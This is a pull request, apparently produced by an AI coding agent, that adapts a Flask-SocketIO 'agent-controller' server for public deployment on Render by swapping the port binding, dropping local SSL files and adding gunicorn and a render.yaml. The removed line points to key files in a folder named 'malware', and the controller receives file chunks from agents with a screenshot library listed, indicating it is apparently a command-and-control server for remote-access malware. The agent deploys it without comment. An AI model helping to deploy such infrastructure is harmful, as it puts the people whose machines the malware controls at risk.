### PR TITLE
Scan controller.py for main.py url

### DIFF
--- a/controller.py
+++ b/controller.py
@@ -1153,4 +1153,4 @@ def handle_file_chunk_from_agent(data):
 
 if __name__ == "__main__":
     print("Starting controller with Socket.IO support...")
-    socketio.run(app, host="0.0.0.0", port=8080, debug=False, keyfile=r"C:\Users\Brylle\Documents\malware\key.pem", certfile=r"C:\Users\Brylle\Documents\malware\cert.pem")
+    socketio.run(app, host="0.0.0.0", port=int(os.environ.get("PORT", 8080)), debug=False)

--- a/render.yaml
+++ b/render.yaml
@@ -1,0 +1,7 @@
+services:
+  - type: web
+    name: agent-controller
+    env: python
+    buildCommand: pip install -r requirements.txt
+    startCommand: gunicorn -k eventlet -w 1 controller:app --bind 0.0.0.0:$PORT
+    plan: free

--- a/requirements.txt
+++ b/requirements.txt
@@ -1,3 +1,4 @@
+gunicorn
 python-socketio
 requests
 mss


### PR DESCRIPTION
Configure `controller.py` and add Render deployment files to enable deployment to Render.

The changes adapt the Flask-SocketIO application for Render's environment, removing local SSL configurations and binding to the Render-provided port. It also introduces `gunicorn` and a `render.yaml` for proper production deployment and service configuration.

---
<a href="https://cursor.com/background-agent?bcId=bc-5abe9428-147b-487c-85dd-49925ba95aa7">
  <picture>
    <source media="(prefers-color-scheme: dark)" srcset="https://cursor.com/open-in-cursor-dark.svg">
    <source media="(prefers-color-scheme: light)" srcset="https://cursor.com/open-in-cursor-light.svg">
    <img alt="Open in Cursor" src="https://cursor.com/open-in-cursor.svg">
  </picture>
</a>
<a href="https://cursor.com/agents?id=bc-5abe9428-147b-487c-85dd-49925ba95aa7">
  <picture>
    <source media="(prefers-color-scheme: dark)" srcset="https://cursor.com/open-in-web-dark.svg">
    <source media="(prefers-color-scheme: light)" srcset="https://cursor.com/open-in-web-light.svg">
    <img alt="Open in Web" src="https://cursor.com/open-in-web.svg">
  </picture>
</a>

